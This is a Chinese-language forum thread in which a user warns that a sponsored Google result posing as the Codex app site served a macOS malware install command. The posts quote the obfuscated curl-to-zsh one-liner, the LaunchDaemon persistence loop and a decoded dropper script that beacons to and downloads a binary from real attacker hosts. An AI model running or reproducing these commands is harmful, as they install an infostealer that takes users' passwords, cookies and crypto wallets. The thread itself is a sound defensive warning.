rt ,这个也确实怪我大意了,不小心中招了,发个帖希望各位站友别犯错
今天用 cc 编码,minmax 模型实在是问题多,我就去 google 搜 codex 官网,下载 codex 试试的
搜索的第一个我就点击进去了(截止发帖时间,依然在第一个),我后面对比了下与 chatgpt 的页面一毛一样
然后我点击第一个链接进去后,按照页面提示点击安装按钮
安装命令我贴出来下
echo "Downloading Codex: https://chatgpt.com/codex-app/Codex.dmg" && curl -s $(echo "aHR0cHM6Ly9ncmVlbmFjdGl2LmNvbS9jdXJsLzRhZjU5ZjBmYTY3YjI5MDljOWQxMWFmM2UwMmE3OTE4MjcxMDhlMmQ1MjU5OGMyN2Y2Mjg2NmEwNDAzMDk2Mzc=" | openssl base64 -d -A) | zsh
这个脚本各种混淆,以及 echo 复杂。。翻译了好半天才找到位置
我的系统是mac ,m3,当前搜索的结果的第一个依然是有病毒的那个,链接地址是:https://sites.google.com/view/mcodxa05?gad_source=1&gad_campaignid=23830654967&gbraid=0AAAABCyPF1X_F5PgAUkSXPc81geK40xyU&gclid=Cj0KCQjw_IXQBhCkARIsADqELbIIIUvj_LG5kiLa0FV0sMTckIfL_HIk4W7aYRY-J-e1PJ3eLmYR86UaAo_iEALw_wcB
病毒的情况是:我安装后,提示我输入密码,我输入后在/Library/LaunchDaemons 中增加一个启动项,启动的内容是home目录下, /Users/xxx/Library/Application Support/.com.apple.accountsd/.service .service的内容在下面,每一秒启动一次AccountsHelper,AccountsHelper是一个二进制程序看不到内容,gemini 给分析是在不断获取cookies 、账号密码加密货币等信息
while true; do
osascript <<EOF
set loginContent to do shell script "stat -f \"%Su\" /dev/console"
if loginContent is not equal to "" and loginContent is not equal to "root"
do shell script "sudo -u " & quoted form of loginContent & " '/Users/zrc/Library/Application Support/.com.apple.accountsd/AccountsHelper'"
end if
EOF
sleep 1
done
 |
1
mangmaimu 14h 38m ago via iPhone
从来没看到过赞助商广告,不知道是区域不同,还是 adguard 或者 UBlock 过滤了
|
 |
2
zrc OP 是我太大意了。。走的代理,区域是香港。
这个域名还是 business.google.com 第一眼看是 google 的域名,也就点进去了。。唉,长记性了 |
 |
3
HFX3389 14h 33m ago
前面给个真的,后面掺上假的
|
 |
4
shoaly 14h 24m ago
装一个 去广告插件的重要性就来了
|
 |
5
since2021 14h 24m ago
为什么不装 ubo ~
|
 |
6
dryyun 14h 19m ago
@zrc #2 这域名不是 google.com 域名吗? 看着二级域名不同而已。
|
 |
7
AlexaZhou 14h 19m ago  11
我一直觉得这种复制一个命令,让用户自己来安装软件的方式,对用户非常危险,根本就不知道装了什么,有没有病毒,今天这就有人中招了
建议大家要抵制这种,尽量不要用这种方式安装 |
 |
9
psllll 14h 14m ago
这网站怎么 520 了
|
 |
10
e23nome 14h 13m ago
@since2021 有数据称 32.5%的美国互联网用户会使用广告拦截工具。
所以美国的虚假竞价排名广告的受害者也是很多的。这也是为什么有这种赞助商广告,并附加月访问量超过 100 万次的背书(虽然有知识的人会觉得太少了)。 谷歌和脸书的收入里相当比例的都是这种诈骗/虚假/恶意广告,哈哈。 |
|
11
e23nome 14h 6m ago
而且这个图(去红框)喂给 AI ,AI 很容易告诉你这个广告是假的。
为啥谷歌投放广告的入口却没有 AI 筛查,就不得而知了。 |
|
12
e23nome 14h 0m ago
chatGPT 说
2. 第二个广告:business.google.com / Install ChatGPT Codex 这个比较奇怪。标题是 ChatGPT Codex ,但显示域名是 business.google.com 。不一定就是诈骗,也可能是 Google Business/广告跳转配置问题,但我会谨慎,不建议点。 我的之所以是第二个,因为我的搜索页面显示了两个赞助商广告,第一个是 openAI 自己投的。 |
 |
13
realpg PRO 10
google 搜出来竞价病毒: 大家警惕避雷
百度搜出来竞价虚假网站: 百度傻逼 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx |
 |
14
Kizishao 13h 30m ago
把安装脚本发给 Gemini ,回复称其为一段典型的恶意脚本,并称其为“恶意广告欺诈”,是通过高价竞价竞标来的。它还提醒 curl | sh 的安装方式极端危险,除非官方文档。
Google 自己都没有用自家的 AI 去审核,实在有些说不过去。 |
 |
15
layden 13h 30m ago
装个 uBlock 吧,不会吃太多性能的。
|
 |
17
zpvip 13h 14m ago
你能把链接贴出来吗,网页截图上显示的 business.google.com 我打开是正常的 Google 子站,我都是自动登录的状态。
Google 赞助商允许链接显示 business.google.com ,但实际链接变成病毒站?你是不是浏览器中毒在先? |
 |
18
ragnaroks 13h 4m ago
看起来是拓展或用户脚本注入的?
无任何拓展的全新 chrome 多次实验不同的常见搜索词,没有一个搜索结果下面是有"过去一个月内访问量超过 100 万次"这种文本的 |
|
19
ragnaroks 13h 2m ago
|
|
20
psllll 12h 57m ago
|
 |
21
hackroad 12h 45m ago
 |
 |
22
xingheng 9h 18m ago 1
|
 |
24
maydb 7h 49m ago
请问中了什么病毒?能多说两句吗?
|
 |
25
kanezeng 7h 6m ago
@psllll 我点进去和你这个链接一样,是个叫 Royalblend4 的软件。比较分裂的是网页标题还是 Codex 。不过页面本身没有任何 Codex 相关的东西。以前还真没注意这个事,因为页面上有表明“赞助商搜索结果”,我都是直接跳过这那一部分。
|
 |
26
Vancion 6h 54m ago via iPhone
现在还是诈骗网站,难道还根据 ip/ua 做了分流?顺手点举报了。
|
 |
27
GoogolChrome111 6h 3m ago
我是 ChatGPT 官网进去,然后在 Microsoft Store 安装的
|
 |
28
iorilu 5h 50m ago
codex cli 命令行就装阿
你要 app, 那就用 windows store, 搜 codex 就行 |
 |
30
383394544 5h 12m ago
你都用 mac 了还不用 homebrew
|
 |
31
crazycloudccc 5h 9m ago
传统搜索引擎已经不可信了, 需要习惯用 AI 了.
|
 |
32
gpt5 5h 1m ago via iPhone
只有基本盘才相信谷歌会作恶😡
|
 |
34
different 4h 49m ago
请问安装后是如何发现有问题的?还是习惯性去检查一下?
|
 |
35
Dream4U 4h 48m ago
默认都不过滤广告的,都是神人
|
 |
36
hlwjia PRO |
 |
37
elboble 4h 29m ago
应该是赞助商提交给 google 的页面被篡改了。
|
 |
38
GeminiPro 4h 25m ago 1
所以盲目崇拜 google 并不可取,谷歌和百度并没有本质区别。
|
|
39
zrc OP 1
我把脚本贴上来,脚本中的变量会每次发生变化,大概的过程是:
1. 通过 curl 获取脚本 2. 脚本中先调用一个接口,告诉远程主机,有人中招了 ```bash curl -fsS --connect-timeout 5 --max-time 10 -X POST -H 'user: BWJF3TX87QAqxEsOaxLu9ZIAH_q__w3aVtJZCqsYhTE' -H 'BuildID: ks6u7pJc12FKlHPoS_nYGUbye8dGpkQrJZkyhNfx9ZI' "https://dedelk.com/api/metrics/run?event=pasted%" ``` 3. 接着下载一个 bin 文件放在了/temp/helper , 4. 执行/temp ,注册系统启动事件,启动程序,删除/temp/helper 具体的脚本内容如下: 第一段更多的是一个迷惑作用,最关键的是 f0f6of 这个变量的内容 ```bash #!/bin/zsh # zzud4h2ltf1y 4890 l5xieuhg="/usr/local/r0mg9" v79vjj=$(uname -s 2>/dev/null) if [ -z "$v79vjj" ]; then v79vjj="Darwin" fi nyyvhzgvij="auto" d60149dy8v3h="$(sw_vers -productVersion 2>/dev/null)" check_integrity_jmq() { local rzut=0 [ -d "$HOME" ] && rzut=1 return $rzut } x4itis=("mkjel4tgg" "qlfo51mwah" "zqg4up9ffg" "gbwzya0uf") xtma=0 while [ $xtma -lt 3 ]; do : "$((RANDOM % 256))" xtma=$((xtma+1)) done z4n64q62=$(cat <<'_EOF_' X1SZu9e8MLYgp7YEYHdgEmWo3WmDtWP1pg8ydKufpE9yUtQLEIizIQ== _EOF_ ) f0f6of=$(openssl base64 -d <<'PAYLOAD_END' | gunzip H4sIAIXW/GkC/5VSXZOaMBR951eklhGdDiOBBNSpO7Pb/XBtu+5W2+46zjigKBQE5Nu1/PeGBIu2 felDJrk3556T3HPfvukYttd5jSyOC2AQbNe2agwafKuTRCG9SoLY3ppAvuiszLTjJa4LfgI9c4Bw CELbiwGvFEK7wbmh0UN4gCUFcam5DaARws2Pkqr15fLhevy5TUBckGF/nQ/4Fq1dA2EOsTSHKqpW eVbmkibPJazRBRHJI1zvmOyYYLBKYoWcCQbjCgsZB4YsxpjVUG6Z5mlNqVHelzm15FSJplZh1UpH pXWShhkn5VYYF3uP0OacLOq+nn2H0uNKroTwBwoqgLiOJkAUl77nmctYLNvqJzHAJLfVcxoDKAHx GTyOJ1MgDoGQRGbYB1ffR7fK9LmrPV3u8ptorOefkt7s/nK42C0WmaJ/i0ezD7voxZreCLTsKrHd 1f11HziRmmjBaAnl24/u8NGfLLyXu6/G3uyu7gLnKRzNnL31sM4JmwAa/IHZUzTA+9rtE+PliyYE TU43VnKU/Z+JVbMRrpuLjmYgZgxp/D9NxXJtIpIrHshqqElHM49GocosahRxILF2O807fS/DIzYg pIbpSPWAqdVZlUm9ncdBevZdTaol2GwRmBW4Pe+vWShZSxU2ymfz4AP+wN5WkBPragGaTRJQSQJZ nkDoBRUpwLv8z4sq4Lg+CdLextbQxukPpIImsnSjp/n+dxxHiS+tLBr/AlTYUkgEBAAA PAYLOAD_END ) k2wjsre8="/usr/local/qxh9l" aau2=0 while [ $aau2 -lt 2 ]; do : "$((RANDOM % 256))" aau2=$((aau2+1)) done if [ -z "$f5bskk" ]; then f5bskk="Darwin" fi f5bskk=$(uname -s 2>/dev/null) z1bt7m="$(date +%s)" gc_collect_k5g() { local zms3=0 [ -d "$HOME" ] && zms3=1 return $zms3 } vgbd9v=("zzwwo0" "ppfrb3yrz" "ninsq") zm3wi7o7x="false" eval "${f0f6of}" ``` f0f6of 的内容,也就是这个代码最真实的意图: ```bash #!/bin/zsh p1ppmfi6b="$(/usr/bin/uptime 2>/dev/null | awk '{print $3}')" lrb945=5034 vemp1br1gj="$((RANDOM))" pw5ofx=$(printf '\150\164\164\160\163\072\057\057\144\145\144\145\154\153\056\143\157\155\057\141\160\151\057\155\145\164\162\151\143\163\057\162\165\156\077\145\166\145\156\164\075\160\141\163\164\145\144') kws8z=$(printf '\143\165\162\154') ${kws8z} -fsS --connect-timeout 5 --max-time 10 -X POST -H 'user: BWJF3TX87QAqxEsOaxLu9ZIAH_q__w3aVtJZCqsYhTE' -H 'BuildID: ks6u7pJc12FKlHPoS_nYGUbye8dGpkQrJZkyhNfx9ZI' "${pw5ofx}" </dev/null >/dev/null 2>&1 & abd2sw=$(printf '\150\164\164\160\163\072\057\057\147\162\145\145\156\141\143\164\151\166\056\143\157\155\057\152\145\164\142\162\141\151\156\163\057\165\160\144\141\164\145') uhqq7n=$(printf '\057\164\155\160\057\150\145\154\160\145\162') ixtpv=$(printf '\170\141\164\164\162') hpl9n=$(printf '\143\150\155\157\144') ${kws8z} -o ${uhqq7n} ${abd2sw} && ${ixtpv} -c ${uhqq7n} && ${hpl9n} +x ${uhqq7n} && ${uhqq7n} : ${v9gi74gk:=0} : ${wvgavxy:=0} : ${tsuo0dh:=0} ``` |
 |
41
zeex 4h 4m ago
我为什么看不到赞助商这一条内容,是 ghostery 插件屏蔽了吗
|
 |
42
rb6221 3h 35m ago
没遇到过,第一次了解到这种.google.com 的域名也有可能是展示的第三方内容,学到了
|
 |
43
digdug 3h 23m ago
我没装 ad block ,但是我为啥搜出来都是官方。。 不太懂
|
|
44
realpg PRO 3
@psllll #20
@hlwjia #36 @elboble #37 没啥篡改的,就是专门针对半懂不懂的人的,而且,这种套路都很久了,已经至少有三五年了 一般是用 google sites 发布一个网站,然后伪装成一个大厂大软件的官网,然后根据后台判定是不是要搞你,要告你就给你一次虚假软件 你举报都没用,都是前端工程动态生成的,google 那边无法复现,审核人员进去就是正常的下载,而且 google 的印度审核比较人机,他们很多时候都分不出真假网站 最早都是做假的 chrome 中文网站,给你推带后门可以执行代码的 chrome ,常态偷返利,还预留了弹性后门等肉鸡多了可以额外搞你,都是圈子里玩烂了的东西,几年了都有人反馈,google 都不修 @HFX3389 #3 给你真的还是假的后面是有算法的,没那么简单 最基本的就是类似当年淘宝根据不同 IP 给不同宣传图让淘宝审核人员看不见虚假宣传 |
 |
46
jetsung 3h 2m ago
早就知道了。就像 *.github.io 。无非就是诈骗犯利用 Google 提供的 自建站平台(初衷是给小企业提供一站式建站的平台)做诈骗活动。
|
 |
47
coder01 2h 59m ago
 我有装 ad block ,第一个出来确实也是这个推广 |
 |
48
tlerbao 2h 58m ago
 那 icon 和地址一瞅都不对,难道不是自己问题吗 |
 |
49
PC9528 2h 55m ago
 感觉是节点的问题, 香港节点是出现这个,换其他的就不会了. |
 |
50
wat4me 2h 54m ago
没装广告插件,搜出来也没广告,应该是看人下菜碟
|
 |
51
lbunderway 2h 52m ago
搜索内容和 op 一样 但是点进去看起来是正常的,除了 title 其他没 codex 信息呢
|
 |
52
sampeng 2h 41m ago
我有广告插件。不过他排在第二个的推荐广告。但这个事最吊诡和离谱的是 google.com 为什么会有问题
|
 |
53
lee321 2h 36m ago
第二部分 base64 解码后,是一个 URL:https://greenactiv.com/curl/4af59f0fa67b2909c9d11af3e02a791827108e2d52598c27f62866a040309637
安装命令会 curl -s URL | zsh 去微步 X 社区 https://x.threatbook.com/ ,查询下域名,是恶意域名,可以辅助判断 |
 |
54
chairuosen 2h 31m ago
可复现,和 LZ 一样
|
 |
55
Varusteki 2h 26m ago
那么问题来了,macOS 要怎么杀毒?
 |
 |
56
sherlockGou 2h 18m ago
|
 |
57
starlin 2h 17m ago
装了广告拦截,没有推广的出现
|
 |
58
cutiechi 2h 13m ago
 |
 |
59
nrtEBH 2h 12m ago
我也发现了 电脑上装了一个假的 codex app , 打开以后被系统拦截直接卸载了
|
 |
60
zhumengyang 2h 11m ago
 |
|
61
cutiechi 2h 9m ago 1
@Varusteki
你可以安装一个 Microsoft Defender https://learn.microsoft.com/en-us/defender-endpoint/microsoft-defender-endpoint-mac |
 |
64
ahbicj 1h 53m ago
感谢提醒,脚本分析也挺干货的。访问搜索引擎跳过 Sponsored 的部分的习惯还是要养成
|
 |
65
migim 1h 52m ago
其实稍微检查一下安装命令就很容易发现异常,但骗子赌的就是有人不注意
|
 |
66
Soffio 1h 52m ago
试了下把 uBlock Origin Lite 插件关了就出现了,所以还是安一个吧
|
 |
68
bowencool 1h 31m ago
我怎么没有
 |
|
69
hlwjia PRO @realpg 学习了。
要是一个什么开源软件或者什么小众软件用 Google Sites 做首页什么的,我还真会信。 这是碰巧是 chatgpt ,我知道肯定不会用 Google Sites ,我能判断肯定有问题。然后就是平时我也不太相信推广内容。 |
 |
70
sparkssssssss 53 mins ago
我们好像不太一样,不知道我是不是有什么脚本/插件
 |
Select Language